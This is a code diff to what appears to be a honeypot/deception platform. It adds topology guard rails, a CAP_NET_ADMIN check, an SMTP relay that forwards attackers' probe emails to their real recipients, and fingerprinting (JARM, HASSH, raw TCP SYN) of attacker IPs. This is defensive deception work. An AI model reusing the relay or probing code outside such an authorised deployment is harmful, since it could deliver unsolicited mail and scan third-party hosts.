+    if forwards_l3_flipped and new_forwards_l3:
+        # Re-derive the home LAN from the edges; same logic as
+        # check_gateway_homed_in_dmz.
+        decky_uuid = decky["uuid"]
+        home_lan_id: Optional[str] = None
+        for e in hydrated["edges"]:
+            if e["decky_uuid"] == decky_uuid and e.get("is_bridge") is False:
+                home_lan_id = e["lan_id"]
+                break
+        if home_lan_id is None:
+            for e in hydrated["edges"]:
+                if e["decky_uuid"] == decky_uuid:
+                    home_lan_id = e["lan_id"]
+                    break
+        home_lan = next(
+            (lan for lan in hydrated["lans"] if lan["id"] == home_lan_id),
+            None,
+        )
+        if home_lan is None or not home_lan.get("is_dmz"):
+            home_name = home_lan["name"] if home_lan else "(unknown)"
+            raise MutationError(
+                f"cannot promote decky {decky['decky_config']['name']!r} "
+                f"to gateway: home LAN {home_name!r} is not a DMZ. "
+                "Move the decky to the DMZ first, or pick a different decky."
+            )
+
+    # Pre-check the destructive flip BEFORE any DB write, so a refused
+    # mutation leaves zero side-effects.
+    is_live = (await _live_topology_or_none(repo, topology_id)) is not None
+    if is_live and forwards_l3_flipped and not bool(payload.get("force")):
+        raise MutationError(
+            f"forwards_l3 flip on live decky "
+            f"{decky['decky_config']['name']!r} requires force=true; "
+            "this will recreate the base container and drop in-container state"
+        )
+
    await repo.update_topology_decky(decky["uuid"], patch)
+
+    # Materialisation — only when the topology is actually live.
+    # _live_topology_or_none was already called above; calling the
+    # individual helpers re-checks (cheap) so they stay self-contained.
+    decky_name = decky["decky_config"]["name"]
+    added = sorted(set(new_services) - set(old_services))
+    removed = sorted(set(old_services) - set(new_services))
+    if added or removed:
+        await _materialise_decky_services_diff(
+            repo, topology_id, decky_name, added, removed,
+        )
+    if forwards_l3_flipped:
+        # force was checked above; reaching here means the operator
+        # opted in.  recreate_base re-renders compose first so the
+        # rebuilt base picks up the new `ports:` block.
+        await _materialise_decky_recreate_base(
+            repo, topology_id, decky_name,
+        )
+
    await _assert_valid_after(repo, topology_id)


 async def apply_update_lan(
    repo: Any, topology_id: str, payload: dict[str, Any]
 ) -> None:
-    """Update LAN fields — subnet, is_dmz, coords, rename."""
+    """Update LAN fields — subnet, is_dmz, coords, rename.
+
+    Guard rail: ``subnet`` and ``is_dmz`` are pinned at deploy time.
+    Live deckies bind to the bridge with IPs allocated from the old
+    subnet (and ``is_dmz`` flips swap the bridge's ``internal=False``
+    flag, which docker can't change on a network with active
+    containers).  Reject those mutations on active/degraded topologies
+    rather than rewriting the DB into an incoherent state.
+
+    Coord-only updates (``x``/``y``) are layout-only; let them through
+    unconditionally.  Renames pass through too — the bridge's docker
+    name is keyed off ``_network_name(topology_id, lan_name)``, so a
+    rename would also need a rebuild — but rename isn't currently a
+    code path on active topologies; if the operator hits it we still
+    write the row and let the next deploy reconcile.
+    """
    hydrated = await _hydrated(repo, topology_id)
    lan = _lan_by_name(hydrated, payload["name"])
    if lan is None:
@@ -389,6 +1017,17 @@ async def apply_update_lan(
            fields[key] = payload[key]
    if not fields:
        return
+
+    topology = await repo.get_topology(topology_id)
+    is_live = bool(topology) and topology.status in ("active", "degraded")
+    if is_live:
+        hostile = {"subnet", "is_dmz"} & fields.keys()
+        if hostile:
+            raise MutationError(
+                f"cannot change {sorted(hostile)} on a deployed LAN; "
+                f"teardown + redeploy required"
+            )
+
    await repo.update_lan(lan["id"], fields)
    await _assert_valid_after(repo, topology_id)

--- a/decnet/network.py
+++ b/decnet/network.py
@@ -151,11 +151,20 @@ def _ensure_network(
        options.update(extra_options)

    for net in client.networks.list(names=[MACVLAN_NETWORK_NAME]):
+        # networks.list() doesn't populate Containers — reload to get the
+        # full inspect payload (including connected container IDs).
+        try:
+            net.reload()
+        except docker.errors.APIError:
+            pass
+
        if net.attrs.get("Driver") == driver:
            # Same driver — but if the IPAM pool drifted (different subnet,
            # gateway, or ip-range than this deploy asks for), reusing it
            # hands out addresses from the old pool and we race the real LAN.
-            # Compare and rebuild on mismatch.
+            # Compare and rebuild on mismatch — but only when no containers
+            # are attached. With active endpoints Docker refuses the remove
+            # with 403; just attach to the existing network instead.
            pools = (net.attrs.get("IPAM") or {}).get("Config") or []
            cur = pools[0] if pools else {}
            if (
@@ -164,8 +173,15 @@ def _ensure_network(
                and cur.get("IPRange") == ip_range
            ):
                return  # right driver AND matching pool, leave it alone
-        # Driver mismatch OR IPAM drift — tear it down. Disconnect any live
-        # containers first so `remove()` doesn't refuse with ErrNetworkInUse.
+            if net.attrs.get("Containers"):
+                # Active endpoints — can't safely rebuild. Attach to the
+                # existing network; IPAM drift on ip_range only affects
+                # Docker's auto-assign pool, which DECNET doesn't use
+                # (IPs are always set explicitly in the compose file).
+                return
+        # Driver mismatch OR empty-endpoint IPAM drift — tear it down.
+        # Disconnect any live containers first so `remove()` doesn't
+        # refuse with ErrNetworkInUse.
        for cid in (net.attrs.get("Containers") or {}):
            try:
                net.disconnect(cid, force=True)
@@ -303,11 +319,44 @@ def remove_bridge_network(client: docker.DockerClient, name: str) -> None:
 # Host-side macvlan interface (hairpin fix)
 # ---------------------------------------------------------------------------

-def _require_root() -> None:
-    if os.geteuid() != 0:
-        raise PermissionError(
-            "MACVLAN host-side interface setup requires root. Run with sudo."
-        )
+# Linux capability bit positions — see capabilities(7).
+_CAP_NET_ADMIN = 12
+
+
+def _has_cap_net_admin() -> bool:
+    """True if the current process holds CAP_NET_ADMIN in its effective set.
+
+    Reads ``/proc/self/status`` rather than calling ``capget(2)`` so we
+    don't need a libcap dependency.  ``CapEff`` is a 64-bit hex bitmask;
+    bit 12 is CAP_NET_ADMIN.
+    """
+    try:
+        with open("/proc/self/status", "r") as fh:
+            for line in fh:
+                if line.startswith("CapEff:"):
+                    bits = int(line.split()[1], 16)
+                    return bool(bits & (1 << _CAP_NET_ADMIN))
+    except OSError:
+        pass
+    return False
+
+
+def _require_net_admin() -> None:
+    """Reject early if the process can't run ``ip link add ... macvlan``.
+
+    CAP_NET_ADMIN is what the kernel actually checks for netlink RTM_NEWLINK
+    of a macvlan/ipvlan slave; euid==0 is sufficient (it grants every cap)
+    but not necessary.  Prefer the cap check so the systemd unit's
+    ``AmbientCapabilities=CAP_NET_ADMIN`` is honoured without forcing the
+    whole API to run as root.
+    """
+    if os.geteuid() == 0 or _has_cap_net_admin():
+        return
+    raise PermissionError(
+        "MACVLAN host-side interface setup needs CAP_NET_ADMIN. "
+        "Either run as root or grant the cap (systemd: "
+        "AmbientCapabilities=CAP_NET_ADMIN)."
+    )


 def setup_host_macvlan(interface: str, host_macvlan_ip: str, decky_ip_range: str) -> None:
@@ -317,7 +366,9 @@ def setup_host_macvlan(interface: str, host_macvlan_ip: str, decky_ip_range: str
    host-helper first: the two drivers can share a parent NIC on paper but
    leaving the opposite helper in place is just cruft after a driver swap.
    """
-    _require_root()
+    _require_net_admin()
+
+    _run(["ip", "link", "del", HOST_IPVLAN_IFACE], check=False)

    _run(["ip", "link", "del", HOST_IPVLAN_IFACE], check=False)

@@ -332,7 +383,7 @@ def setup_host_macvlan(interface: str, host_macvlan_ip: str, decky_ip_range: str


 def teardown_host_macvlan(decky_ip_range: str) -> None:
-    _require_root()
+    _require_net_admin()
    _run(["ip", "route", "del", decky_ip_range, "dev", HOST_MACVLAN_IFACE], check=False)
    _run(["ip", "link", "del", HOST_MACVLAN_IFACE], check=False)

@@ -344,7 +395,9 @@ def setup_host_ipvlan(interface: str, host_ipvlan_ip: str, decky_ip_range: str)
    host-helper first so a prior macvlan deploy doesn't leave its slave
    dangling on the parent NIC after the driver swap.
    """
-    _require_root()
+    _require_net_admin()
+
+    _run(["ip", "link", "del", HOST_MACVLAN_IFACE], check=False)

    _run(["ip", "link", "del", HOST_MACVLAN_IFACE], check=False)

@@ -358,7 +411,7 @@ def setup_host_ipvlan(interface: str, host_ipvlan_ip: str, decky_ip_range: str)


 def teardown_host_ipvlan(decky_ip_range: str) -> None:
-    _require_root()
+    _require_net_admin()
    _run(["ip", "route", "del", decky_ip_range, "dev", HOST_IPVLAN_IFACE], check=False)
    _run(["ip", "link", "del", HOST_IPVLAN_IFACE], check=False)

@@ -378,3 +431,47 @@ def ips_to_range(ips: list[str]) -> str:
        strict=False,
    )
    return str(network)
+
+
+# ---------------------------------------------------------------------------
+# Container veth resolution (for tc netem tarpit)
+# ---------------------------------------------------------------------------
+
+def get_container_pid(container_name: str) -> int:
+    """Return the PID of a running container's init process."""
+    client = docker.from_env()
+    try:
+        container = client.containers.get(container_name)
+    except docker.errors.NotFound:
+        raise LookupError(f"container {container_name!r} not found")
+    pid = container.attrs["State"]["Pid"]
+    if not pid:
+        raise LookupError(f"container {container_name!r} is not running (PID=0)")
+    return pid
+
+
+def get_container_veth(container_name: str) -> str:
+    """Return the host veth interface name paired to container_name's eth0.
+
+    Reads /sys/class/net/eth0/iflink from inside the container to get the
+    peer interface index, then matches it against ``ip link show`` on the host.
+    Requires no nsenter and no elevated privileges beyond what Docker exec grants.
+    """
+    result = _run(
+        ["docker", "exec", container_name, "cat", "/sys/class/net/eth0/iflink"],
+        check=False,
+    )
+    if result.returncode != 0:
+        raise LookupError(
+            f"container {container_name!r} not reachable: {result.stderr.strip()}"
+        )
+    peer_index = result.stdout.strip()
+    links = _run(["ip", "link", "show"])
+    for line in links.stdout.splitlines():
+        if line.startswith(f"{peer_index}:"):
+            # Format: "42: veth3a4b5c@if41: <BROADCAST,...>"
+            iface = line.split(":")[1].strip().split("@")[0]
+            return iface
+    raise LookupError(
+        f"no host veth found for container {container_name!r} (peer ifindex {peer_index})"
+    )
--- a/decnet/orchestrator/drivers/init.py
+++ b/decnet/orchestrator/drivers/init.py
@@ -65,7 +65,7 @@ def get_driver_for(action: Action) -> ActivityDriver:
    try:
        from decnet.orchestrator.emailgen.scheduler import EmailAction
    except ImportError:  # pragma: no cover - scheduler always exists
-        EmailAction = None  # type: ignore[assignment]
+        EmailAction = None  # type: ignore[assignment, misc]
    if EmailAction is not None and isinstance(action, EmailAction):
        from decnet.orchestrator.drivers.email import EmailDriver
        return EmailDriver()
--- a/decnet/orchestrator/drivers/email.py
+++ b/decnet/orchestrator/drivers/email.py
@@ -176,7 +176,7 @@ class EmailDriver(ActivityDriver):
        """Convenience accessor for telemetry / logging."""
        return self._llm.model

-    async def run(self, action: EmailAction) -> ActivityResult:
+    async def run(self, action: EmailAction) -> ActivityResult:  # type: ignore[override]
        return await self._run_email(action)

    async def _run_email(self, action: EmailAction) -> ActivityResult:
--- a/decnet/orchestrator/drivers/smtp_relay.py
+++ b/decnet/orchestrator/drivers/smtp_relay.py
@@ -0,0 +1,80 @@
+"""SMTP probe-relay driver.
+
+Forwards the attacker's first probe email via the master's real internet
+connection. The smtp_relay decky runs on MACVLAN and has no gateway access;
+the master (where this worker runs) does.
+
+Called by the realism worker's smtp probe listener, not the main tick loop.
+"""
+from __future__ import annotations
+
+import email
+import smtplib
+from pathlib import Path
+from typing import Any
+
+_ARTIFACTS_ROOT_DEFAULT = "/var/lib/decnet/artifacts"
+
+
+def _ensure_from_header(body: bytes, mail_from: str) -> bytes:
+    """Return body with a From: header added if one is absent."""
+    try:
+        msg = email.message_from_bytes(body)
+    except Exception:
+        return body
+    if msg["From"]:
+        return body
+    # Prepend the header before the existing content.
+    header_line = f"From: {mail_from}\r\n".encode()
+    return header_line + body
+
+
+def forward_probe(
+    *,
+    svc_cfg: dict[str, Any],
+    stored_as: str,
+    decky_name: str,
+    mail_from: str,
+    rcpt_to: list[str],
+    artifacts_root: str = _ARTIFACTS_ROOT_DEFAULT,
+) -> tuple[bool, str]:
+    """Read the .eml from disk and forward it via the upstream relay.
+
+    Returns (True, "") on success or (False, reason) on failure.
+    Always safe to call in a thread — uses only blocking I/O.
+    """
+    upstream_host = (svc_cfg.get("upstream_host") or "").strip()
+    if not upstream_host:
+        return False, "upstream_host not configured"
+
+    eml_path = Path(artifacts_root) / decky_name / "smtp" / stored_as
+    try:
+        body = eml_path.read_bytes()
+    except OSError as exc:
+        return False, f"cannot read eml: {exc}"
+
+    if not rcpt_to:
+        return False, "no recipients"
+
+    upstream_port  = int(svc_cfg.get("upstream_port") or 25)
+    upstream_user  = (svc_cfg.get("upstream_user") or "").strip()
+    upstream_pass  = (svc_cfg.get("upstream_pass") or "").strip()
+    envelope_from  = (svc_cfg.get("upstream_sender") or "").strip() or mail_from
+
+    # Ensure the message has a From: header so mail clients show the attacker's
+    # address rather than falling back to the envelope sender (upstream_sender).
+    # Minimal relay-test scripts often omit headers entirely.
+    body = _ensure_from_header(body, mail_from)
+
+    try:
+        with smtplib.SMTP(upstream_host, upstream_port, timeout=15) as conn:
+            conn.ehlo()
+            if conn.has_extn("STARTTLS"):
+                conn.starttls()
+                conn.ehlo()
+            if upstream_user and upstream_pass:
+                conn.login(upstream_user, upstream_pass)
+            conn.sendmail(envelope_from, rcpt_to, body)
+        return True, ""
+    except Exception as exc:
+        return False, str(exc)[:256]
--- a/decnet/orchestrator/drivers/ssh.py
+++ b/decnet/orchestrator/drivers/ssh.py
@@ -18,11 +18,8 @@ or IP can't escape into a shell.
 from __future__ import annotations

 import asyncio
-import shlex
 from typing import Any
-
-import base64
-from datetime import datetime, timezone
+from datetime import datetime

 from decnet.logging import get_logger
 from decnet.orchestrator.drivers.base import ActivityDriver, ActivityResult
@@ -226,36 +223,24 @@ class SSHDriver(ActivityDriver):
    ) -> ActivityResult:
        """Write *content* to *path* inside *decky_name*'s ssh container.

-        Streams base64 via stdin (mirrors :mod:`decnet.canary.planter`'s
-        ARG_MAX-safe write — see commit c17b9e0).  Sets file mode and,
-        when *mtime* is provided, ``touch -d`` to backdate the file so
-        it doesn't all stamp at wall-clock-now (the realism failure
-        this migration is fixing).
+        Delegates to :func:`decnet.decky_io.write_file_to_container`,
+        which carries the ARG_MAX-safe base64-via-stdin trick.  Sets
+        file mode and, when *mtime* is provided, ``touch -d`` to
+        backdate the file (otherwise everything stamps at wall-clock-now
+        — the realism failure this path was originally fixing).
        """
+        from decnet.decky_io import write_file_to_container
+
        container = _container_for(decky_name)
-        b64 = base64.b64encode(content).decode("ascii")
-        # touch -d accepts ISO 8601; we always emit UTC so the
-        # container's local TZ doesn't drift the mtime.
-        if mtime is not None:
-            ts = mtime.astimezone(timezone.utc).strftime("%Y-%m-%d %H:%M:%S UTC")
-            touch_cmd = f"touch -d {shlex.quote(ts)} {shlex.quote(path)}"
-        else:
-            touch_cmd = f"touch {shlex.quote(path)}"
-        sh_cmd = (
-            f"mkdir -p {shlex.quote(_dirname(path))} && "
-            f"base64 -d > {shlex.quote(path)} && "
-            f"chmod {mode:o} {shlex.quote(path)} && "
-            f"{touch_cmd}"
+        success, error = await write_file_to_container(
+            container, path, content, mode=mode, mtime=mtime, timeout=_TIMEOUT,
        )
-        argv = [_DOCKER, "exec", "-i", container, "sh", "-c", sh_cmd]
-        rc, _stdout, stderr = await _run_with_stdin(argv, b64.encode("ascii"))
-        success = rc == 0
        payload: dict[str, Any] = {
            "dst_decky": decky_name,
            "path": path,
            "bytes": len(content),
-            "rc": rc,
-            "stderr": stderr.strip()[:256] if not success else None,
+            "rc": 0 if success else 1,
+            "stderr": error if not success else None,
        }
        return ActivityResult(success=success, payload=payload)

@@ -283,11 +268,3 @@ class SSHDriver(ActivityDriver):
        )


-def _dirname(path: str) -> str:
-    """Pure-string dirname.  We can't trust ``os.path.dirname`` on the
-    host to share the destination container's separator semantics, but
-    deckies are POSIX so a plain ``rfind('/')`` suffices."""
-    idx = path.rfind("/")
-    if idx <= 0:
-        return "/"
-    return path[:idx]
--- a/decnet/orchestrator/emailgen/scheduler.py
+++ b/decnet/orchestrator/emailgen/scheduler.py
@@ -131,13 +131,13 @@ async def _resolve_personas(
        topology = await repo.get_topology(topology_id)
        if not topology:
            return [], source
-        return (
-            parse_personas(
-                topology.get("email_personas"),
-                language_default=topology.get("language_default") or "en",
-            ),
-            source,
-        )
+        if isinstance(topology, dict):
+            raw = topology.get("email_personas")
+            lang = topology.get("language_default") or "en"
+        else:
+            raw = topology.email_personas
+            lang = topology.language_default or "en"
+        return parse_personas(raw, language_default=lang), source
    # Fleet / shard / anything else → global pool.
    return global_pool.load(), source

@@ -175,7 +175,7 @@ async def pick(
        )
        return None

-    active = [p for p in personas if in_active_hours(p, now_dt.hour)]
+    active = [p for p in personas if in_active_hours(p, now_dt)]
    if len(active) < 2:
        logger.debug(
            "emailgen pick: source=%s mail_decky=%s only %d personas in-hours",
--- a/decnet/orchestrator/scheduler.py
+++ b/decnet/orchestrator/scheduler.py
@@ -311,17 +311,22 @@ async def _resolve_personas(
    return enriched


-def _topology_personas(topology: Optional[dict[str, Any]]) -> list[EmailPersona]:
+def _topology_personas(topology) -> list[EmailPersona]:
    if not topology:
        return []
-    raw = topology.get("email_personas")
+    if isinstance(topology, dict):
+        raw = topology.get("email_personas")
+        lang = topology.get("language_default") or "en"
+    else:
+        raw = topology.email_personas
+        lang = topology.language_default or "en"
    if raw is None:
        return []
    if isinstance(raw, list):
-        return parse_personas(raw, language_default=topology.get("language_default") or "en")
+        return parse_personas(raw, language_default=lang)
    if isinstance(raw, str):
        try:
-            return parse_personas(json.loads(raw), language_default=topology.get("language_default") or "en")
+            return parse_personas(json.loads(raw), language_default=lang)
        except json.JSONDecodeError:
            return []
    return []
--- a/decnet/orchestrator/worker.py
+++ b/decnet/orchestrator/worker.py
@@ -25,6 +25,7 @@ import secrets
 from datetime import datetime, timezone
 from typing import Any, Optional

+from decnet.bus import topics as _topics
 from decnet.bus.factory import get_bus
 from decnet.bus.publish import (
    publish_safely,
@@ -34,6 +35,7 @@ from decnet.bus.publish import (
 from decnet.logging import get_logger
 from decnet.orchestrator import events, scheduler
 from decnet.orchestrator.drivers import get_driver_for
+from decnet.orchestrator.drivers.smtp_relay import forward_probe
 from decnet.orchestrator.emailgen import (
    events as email_events,
    scheduler as email_scheduler,
@@ -127,6 +129,7 @@ async def orchestrator_worker(
    # operator's intent rather than the baked-in defaults. A failure
    # here logs and falls through; the planner already holds defaults.
    await _refresh_realism_config(repo)
+    await _refresh_llm_config(repo)

    shutdown = asyncio.Event()
    heartbeat_task = asyncio.create_task(
@@ -138,6 +141,9 @@ async def orchestrator_worker(
    control_task = asyncio.create_task(
        run_control_listener(bus, "orchestrator", shutdown),
    )
+    probe_task = asyncio.create_task(
+        _run_smtp_probe_listener(repo, shutdown),
+    )
    tick_n = 0
    try:
        while not shutdown.is_set():
@@ -156,8 +162,9 @@ async def orchestrator_worker(
                await _periodic_prune(repo)
            if tick_n % _REALISM_CONFIG_REFRESH_TICKS == 0:
                await _refresh_realism_config(repo)
+                await _refresh_llm_config(repo)
    finally:
-        for t in (heartbeat_task, control_task):
+        for t in (heartbeat_task, control_task, probe_task):
            t.cancel()
            with contextlib.suppress(Exception, asyncio.CancelledError):
                await t
@@ -218,6 +225,18 @@ async def _refresh_realism_config(repo: BaseRepository) -> None:
        logger.warning("realism config refresh: rejected payload: %s", exc)


+async def _refresh_llm_config(repo: BaseRepository) -> None:
+    """Pull operator-tuned LLM config from realism_config into the backend cache."""
+    from decnet.realism.llm.config import apply, load_from_db
+    cfg = await load_from_db(repo)
+    if cfg is None:
+        return
+    try:
+        apply(cfg)
+    except Exception as exc:  # noqa: BLE001
+        logger.warning("llm config refresh: apply failed: %s", exc)
+
+
 def _roll_action_kind(rng: secrets.SystemRandom) -> str:
    total = sum(w for _, w in _ACTION_WEIGHTS)
    target = rng.randint(1, total)
@@ -303,7 +322,7 @@ async def _pick_action(
            )
        elif kind == "email":
            try:
-                action = await email_scheduler.pick(repo, rand=rng)
+                action = await email_scheduler.pick(repo, rand=rng)  # type: ignore[assignment]
            except Exception as exc:  # noqa: BLE001
                logger.debug("orchestrator: email pick failed: %s", exc)
                action = None
@@ -467,6 +486,100 @@ async def _bump_synthetic_file_after_edit(repo, action, result) -> None:
    await repo.update_synthetic_file(action.synthetic_file_uuid, patch)


+async def _run_smtp_probe_listener(
+    repo: BaseRepository,
+    shutdown: asyncio.Event,
+) -> None:
+    """Subscribe to smtp.probe.pending and forward probe emails upstream.
+
+    Runs as a long-lived subtask alongside the tick loop. When a probe lands
+    we check if this (attacker_ip, decky) has already been forwarded up to
+    probe_limit times — if not, forward via the master's real internet
+    connection and store a probe_relay bounty with the result.
+    """
+    try:
+        bus = get_bus(client_name="orchestrator-probe")
+        await bus.connect()
+        sub = bus.subscribe(_topics.smtp("probe.pending"))
+        async with sub:
+            async for event in sub:
+                if shutdown.is_set():
+                    break
+                try:
+                    await _handle_probe_pending(repo, event.payload)
+                except Exception as exc:  # noqa: BLE001
+                    logger.warning("smtp probe listener: handle error: %s", exc)
+    except asyncio.CancelledError:
+        raise
+    except Exception as exc:  # noqa: BLE001
+        logger.warning("smtp probe listener: bus unavailable: %s", exc)
+    finally:
+        with contextlib.suppress(Exception):
+            await bus.close()
+
+
+async def _handle_probe_pending(repo: BaseRepository, payload: dict) -> None:
+    decky_name  = (payload.get("decky") or "").strip()
+    attacker_ip = (payload.get("attacker_ip") or "").strip()
+    stored_as   = (payload.get("stored_as") or "").strip()
+    mail_from   = (payload.get("mail_from") or "").strip()
+    rcpt_to_raw = (payload.get("rcpt_to") or "").strip()
+
+    if not (decky_name and attacker_ip and stored_as):
+        return
+
+    decky_row = await repo.get_fleet_decky_by_name(decky_name)
+    if not decky_row:
+        return
+    svc_cfg = (
+        (decky_row.get("decky_config") or {})
+        .get("service_config", {})
+        .get("smtp_relay") or {}
+    )
+    if not (svc_cfg.get("upstream_host") or "").strip():
+        return
+
+    probe_limit = int(svc_cfg.get("probe_limit") or 1)
+    already_sent = await repo.count_probe_relays(attacker_ip, decky_name)
+    if already_sent >= probe_limit:
+        return
+
+    rcpt_to = [r.strip() for r in rcpt_to_raw.split(",") if r.strip()]
+    artifacts_root = os.environ.get("DECNET_ARTIFACTS_ROOT", "/var/lib/decnet/artifacts")
+
+    loop = asyncio.get_event_loop()
+    ok, reason = await loop.run_in_executor(
+        None,
+        lambda: forward_probe(
+            svc_cfg=svc_cfg,
+            stored_as=stored_as,
+            decky_name=decky_name,
+            mail_from=mail_from,
+            rcpt_to=rcpt_to,
+            artifacts_root=artifacts_root,
+        ),
+    )
+
+    await repo.add_bounty({
+        "decky": decky_name,
+        "service": "smtp_relay",
+        "attacker_ip": attacker_ip,
+        "bounty_type": "probe_relay",
+        "payload": {
+            "stored_as": stored_as,
+            "forwarded": ok,
+            **({"fwd_error": reason} if not ok else {}),
+        },
+    })
+    if ok:
+        logger.info("smtp probe forwarded decky=%s ip=%s", decky_name, attacker_ip)
+    else:
+        logger.warning(
+            "smtp probe forward failed decky=%s ip=%s error=%s",
+            decky_name, attacker_ip, reason,
+        )
+
+
 async def _record_synthetic_file(repo, action) -> None:
    """Persist (or patch) a synthetic_files row after a FileAction plant.

--- a/decnet/prober/tcpfp.py
+++ b/decnet/prober/tcpfp.py
@@ -48,7 +48,7 @@ def _send_syn(
    Craft a TCP SYN with common options and send it. Returns the
    SYN-ACK response packet or None on timeout/failure.
    """
-    from scapy.all import IP, TCP, conf, sr1
+    from scapy.all import IP, TCP, conf, sr1  # type: ignore[attr-defined]

    # Suppress scapy's noisy output
    conf.verb = 0
@@ -83,7 +83,7 @@ def _send_syn(
        return None

    # Verify it's a SYN-ACK (flags == 0x12)
-    from scapy.all import TCP as TCPLayer
+    from scapy.all import TCP as TCPLayer  # type: ignore[attr-defined]
    if not resp.haslayer(TCPLayer):
        return None
    if resp[TCPLayer].flags != 0x12:  # SYN-ACK
@@ -103,7 +103,7 @@ def _send_rst(
 ) -> None:
    """Send RST to clean up the half-open connection."""
    try:
-        from scapy.all import IP, TCP, send
+        from scapy.all import IP, TCP, send  # type: ignore[attr-defined]
        rst = (
            IP(dst=host)
            / TCP(
@@ -124,7 +124,7 @@ def _parse_synack(resp: Any) -> dict[str, Any]:
    """
    Extract fingerprint fields from a scapy SYN-ACK response packet.
    """
-    from scapy.all import IP, TCP
+    from scapy.all import IP, TCP  # type: ignore[attr-defined]

    ip_layer = resp[IP]
    tcp_layer = resp[TCP]
--- a/decnet/prober/worker.py
+++ b/decnet/prober/worker.py
@@ -27,6 +27,9 @@ from datetime import datetime, timezone
 from pathlib import Path
 from typing import Any, Callable

+from sqlalchemy.engine import Engine
+from sqlmodel import Session
+
 from decnet.bus import topics as _topics
 from decnet.bus.base import BaseBus
 from decnet.bus.factory import get_bus
@@ -35,6 +38,10 @@ from decnet.bus.publish import (
    run_control_listener,
    run_health_heartbeat,
 )
+from decnet.correlation.fingerprint_rotation import (
+    ProbeType,
+    record_fingerprint,
+)
 from decnet.logging import get_logger
 from decnet.prober.hassh import hassh_server
 from decnet.prober.jarm import JARM_EMPTY_HASH, jarm_hash
@@ -44,6 +51,21 @@ from decnet.telemetry import traced as _traced

 logger = get_logger("prober")

+
+def _build_sync_engine() -> Engine:
+    """Construct a sync SQLite engine for rotation-detection state.
+
+    Used inline by the prober; it lives outside the async repository
+    layer because rotation detection is a sync hook on a sync probe
+    path.  Honors the same defaulting as
+    ``decnet.web.db.sqlite.repository.SQLiteRepository``.
+    """
+    import os
+    from decnet.config import _ROOT
+    from decnet.web.db.sqlite.database import get_sync_engine
+    db_path = os.environ.get("DECNET_DB_PATH", str(_ROOT / "decnet.db"))
+    return get_sync_engine(db_path)
+
 # ─── Default ports per probe type ───────────────────────────────────────────

 # JARM: common C2 callback / TLS server ports
@@ -233,6 +255,14 @@ def _discover_attackers(json_path: Path, position: int) -> tuple[set[str], int]:

 ProbePublishFn = Callable[[str, dict[str, Any]], None]

+# Rotation recorder: takes (attacker_ip, port, probe_type, new_hash) and
+# performs the rotation-detection upsert + derived-event emission for the
+# DEBT-032 substrate-fingerprint flow.  Optional; when None the prober
+# behaves exactly as before (raw fingerprint emit only, no rotation
+# detection).  Construction lives at worker startup so phase functions
+# don't have to know about the DB engine.
+RotationRecorderFn = Callable[[str, int, "ProbeType", str], None]
+

@_traced("prober.probe_cycle")
 def _probe_cycle(
@@ -245,6 +275,7 @@ def _probe_cycle(
    json_path: Path,
    timeout: float = 5.0,
    publish_fn: ProbePublishFn | None = None,
+    record_rotation: RotationRecorderFn | None = None,
 ) -> None:
    """
    Probe all known attacker IPs with JARM, HASSH, and TCP/IP fingerprinting.
@@ -263,13 +294,13 @@ def _probe_cycle(
        ip_probed = probed.setdefault(ip, {})

        # Phase 1: JARM (TLS fingerprinting)
-        _jarm_phase(ip, ip_probed, jarm_ports, log_path, json_path, timeout, publish_fn)
+        _jarm_phase(ip, ip_probed, jarm_ports, log_path, json_path, timeout, publish_fn, record_rotation)

        # Phase 2: HASSHServer (SSH fingerprinting)
-        _hassh_phase(ip, ip_probed, ssh_ports, log_path, json_path, timeout, publish_fn)
+        _hassh_phase(ip, ip_probed, ssh_ports, log_path, json_path, timeout, publish_fn, record_rotation)

        # Phase 3: TCP/IP stack fingerprinting
-        _tcpfp_phase(ip, ip_probed, tcpfp_ports, log_path, json_path, timeout, publish_fn)
+        _tcpfp_phase(ip, ip_probed, tcpfp_ports, log_path, json_path, timeout, publish_fn, record_rotation)


@_traced("prober.jarm_phase")
@@ -281,6 +312,7 @@ def _jarm_phase(
    json_path: Path,
    timeout: float,
    publish_fn: ProbePublishFn | None = None,
+    record_rotation: RotationRecorderFn | None = None,
 ) -> None:
    """JARM-fingerprint an IP on the given TLS ports."""
    done = ip_probed.setdefault("jarm", set())
@@ -301,6 +333,8 @@ def _jarm_phase(
                msg=f"JARM {ip}:{port} = {h}",
            )
            logger.info("prober: JARM %s:%d = %s", ip, port, h)
+            if record_rotation is not None:
+                record_rotation(ip, port, "jarm", h)
            if publish_fn is not None:
                publish_fn(
                    "jarm",
@@ -387,6 +421,7 @@ def _hassh_phase(
    json_path: Path,
    timeout: float,
    publish_fn: ProbePublishFn | None = None,
+    record_rotation: RotationRecorderFn | None = None,
 ) -> None:
    """HASSHServer-fingerprint an IP on the given SSH ports."""
    done = ip_probed.setdefault("hassh", set())
@@ -412,6 +447,8 @@ def _hassh_phase(
                msg=f"HASSH {ip}:{port} = {result['hassh_server']}",
            )
            logger.info("prober: HASSH %s:%d = %s", ip, port, result["hassh_server"])
+            if record_rotation is not None:
+                record_rotation(ip, port, "hassh", result["hassh_server"])
            if publish_fn is not None:
                publish_fn(
                    "hassh",
@@ -445,6 +482,7 @@ def _tcpfp_phase(
    json_path: Path,
    timeout: float,
    publish_fn: ProbePublishFn | None = None,
+    record_rotation: RotationRecorderFn | None = None,
 ) -> None:
    """TCP/IP stack fingerprint an IP on the given ports."""
    done = ip_probed.setdefault("tcpfp", set())
@@ -478,6 +516,8 @@ def _tcpfp_phase(
                msg=f"TCPFP {ip}:{port} = {result['tcpfp_hash']}",
            )
            logger.info("prober: TCPFP %s:%d = %s", ip, port, result["tcpfp_hash"])
+            if record_rotation is not None:
+                record_rotation(ip, port, "tcpfp", result["tcpfp_hash"])
            if publish_fn is not None:
                publish_fn(
                    "tcpfp",
@@ -586,6 +626,61 @@ async def prober_worker(
            event_type,
        )

+    # Substrate-rotation detection (DEBT-032) — open a sync engine for
+    # the prober's lifetime; recorder closes a session per call so we
+    # never hold a connection across phase boundaries.  Failure to
+    # connect is non-fatal: probes continue, rotation detection is
+    # silently disabled.
+    rotation_engine: Engine | None = None
+    record_rotation: RotationRecorderFn | None = None
+    try:
+        rotation_engine = _build_sync_engine()
+    except Exception as exc:  # noqa: BLE001
+        logger.warning(
+            "prober: rotation-detection DB unavailable, "
+            "running with rotation detection disabled: %s", exc,
+        )
+
+    if rotation_engine is not None:
+        def _publish_rotation(event_type: str, payload: dict[str, Any]) -> None:
+            raw_publish(
+                _topics.attacker(_topics.ATTACKER_FINGERPRINT_ROTATED),
+                payload,
+                event_type,
+            )
+
